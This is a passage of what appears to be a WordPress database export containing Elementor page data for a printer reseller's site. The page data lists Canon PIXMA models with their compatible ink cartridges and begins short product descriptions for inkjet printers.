width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-10<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-72 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-72 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-42 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-42 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TR8570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS207<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6981,3310,'_elementor_version','2.5.14'),(6984,3311,'_wp_page_template','template-fullwidth.php'),(6985,3311,'_elementor_edit_mode','builder'),(6986,3311,'_elementor_template_type','post'),(6987,3311,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 